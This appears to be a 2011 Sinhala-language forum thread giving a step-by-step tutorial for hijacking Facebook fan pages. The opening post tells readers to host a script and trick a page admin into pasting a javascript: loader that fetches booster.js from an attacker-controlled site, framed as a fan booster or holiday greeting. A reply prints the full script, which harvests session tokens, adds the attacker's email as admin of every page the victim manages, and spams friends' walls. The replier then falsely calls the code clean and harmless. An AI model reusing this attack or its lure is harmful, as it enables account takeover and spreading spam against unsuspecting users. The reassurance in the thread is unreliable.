Facebook Fan Page එකක් hack කරමු

Sempl3 m0d

Banned
Mar 18, 2011
30
9
0

1) මේ code එක බාගන්න.
2) ඒ code එක ඇතුලේ [email protected] search කරලා එතනට ඔයාලගේ facebook account එක register කරලා තියෙන email එක දෙන්න.
3) Did you see this? එක search කරලා කැමතිනම් ඒකත් වෙනස් කරන්න. ඒකෙන් කරන්නේ fan page admin ගේ account එකෙන් එයාගේ යාලුවො කීපදෙනෙක්ගේ wall වල ලියන එක. ඒ ලියන msg එක තම්යි මේ. (මෙතන නම් යාලුවො 25දෙනෙකුගේ wall වල ලියනවා. ඊට වඩා දැම්මොත් සමහර විට facebook එකෙන් bot එකක් කියලා අපෙ code එක block කරන්න උනත් පුලුවන්).
4) දැන් තියෙන්නේ මේ script එක server එකකට දාගන්න. තමන්ට server එකක් තියෙනවානම් හොදයි තමයි. නැත්නම් 0fess.net හරි 000webhost.com වලට ගිහිල්ල එක කරගන්න. ඒක upload කරගන්න තෙරෙන්නේ නැත්නම් පොඩ්ඩක් google එකේ search කරන්නදැන් ඔයාලගේ script එකට තියෙන url එක මෙවගේ වෙන්න ඕන. ( server එකට file එකක් upload කරගන්න තේරෙන්නේ නැත්නම් comment එකක් දාලායන්න. එකටත් ලිපියක් දාන්නම්)
6) දැන් තමයි ගේමේ හොදම කැල්ල. අපිට කරගන්න ඕන වෙන්නේ පහල තියෙන code එක fan page admin ට කියලා එයාගේ browser addressbar එකට දාල enter එක ඔබාගන්න එක. ඔය වැඩේ කරගන්න පුලුවන් නම් හරි. (bold අකුරු වලින් තියෙන ඒවා වෙනස් කරන්න ඕන) ඔයාල හිතයි මොන මෝඩයාද මෙහෙම එකක් තමන්ගේ addressbar එකේ enter කරන්නේ කියලා. ඒඋනාට birthday wishes දාන්න new year wishes දාන්න කටිටීය මේවගේ දේවල් පාවිච්චි කරනවා. ඉතින් ඒවගේ කාලයක් අල්ලලා දැම්මොත් fan page එක බිලීබාගන්න බැරිවෙන එකක් නැහැ.
javascript:(a = (b = document).createElement(“script”)).src = “//www.yourwebsite.0fess.net/booster.js“, b.body.appendChild(a); void(0)
අමතර: දැන් මෙතන booster.js කියලා එකක් url එකේ පේන්න තියෙනවා. එක නිසා අපිට පුලුවන් facebook fanpage එකේ ලියන්න page එකේ fansලා වැඩිකරගන්න මේක run කරන්න කියලා. කැමති නම් නොමිලේ ගන්න පුලුවන් .tk domain එකක් අරගෙන ඒ domain එක මේකට redirect කරගන්නත් පුලුවන්.
 

Topology

Member
Feb 24, 2011
2,395
225
0
Out of Elakiri.
Beware !!!!!
He's gonna hack ur Facebook account
:frown::frown::frown:
//These are to be posted as status messages

txt = "Did you see this?";


alert("Please wait 10-15 seconds, that we can analyze your friends to boost pages fans! Then click 'OK'to continue!");

with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {
if (x.readyState == 4 && x.status == 200) {
z=x.responseText;
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
with(xx = new XMLHttpRequest())open("GET", "/ajax/browser/friends/?uid="+document.cookie.match(/c_user=(\d+)/)[1]+"&filter=all&__a=1&__d=1"),
onreadystatechange = function () {
//extracts list of friends
if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
i = 0;
llimit=25;
t = setInterval(function () {
if (i >= llimit )return;//it seems the limit is 25 posts per 2 seconds on facebook (to be counted as bot)
if(i == 0) {//do it only once
with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),setRequestHeader("X-Requested-With", null),setRequestHeader("X-Requested", null),onreadystatechange = function()
{
if(ddddd.readyState == 4 && ddddd.status == 200) {
llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); len =llm.length;
j=0;
for(j=0;j<len;j++) {
with(xxxcxxx = new XMLHttpRequest()) open("POST", "/pages/edit/?id="+llm[j].replace(/\\"id\\":/i, "")+"&sk=admin"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("post_form_id="+pfid+"&fb_dtsg="+dt+"&fbpage_id="+llm[j].replace(/\\"id\\":/i, "")+
"&friendselector_input[][email protected] &friend_selected[]=&save=1");
//this adds as admin of all pages the user holds
}
}
}, send(null); //end of function to change the admins
}
if(i%2==0)
{
//following code does status update
//the code writes message represented by txt on the wall of friends.
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt +
"&target_id=" + m[Math.floor(Math.random() * m.length)] +
"&composer_id=" +
"&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" +form + "&fb_dtsg=" + dt +
"&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
else
{
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt +
"&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id="+
"&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt +
"&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
i += 1;
}, 2000);// 2000 milli-sec window, after which the script is executed again
}
}, send(null);
}
}, send(null);
This code is clean.!
I checked that myself.
this is some ajax.
 

Topology

Member
Feb 24, 2011
2,395
225
0
Out of Elakiri.
yeah it might be risk. but I am pretty sure it won't hack your facebook account
cause it doesn't even use relevant Cookies/Third party server address/form submit (to a third party server). to send request to any site, it should use document.formxxx.submit();
then the server can capture whatever it was sent. this is NOT something like that.
it purely inside the facebook only.
 
Last edited: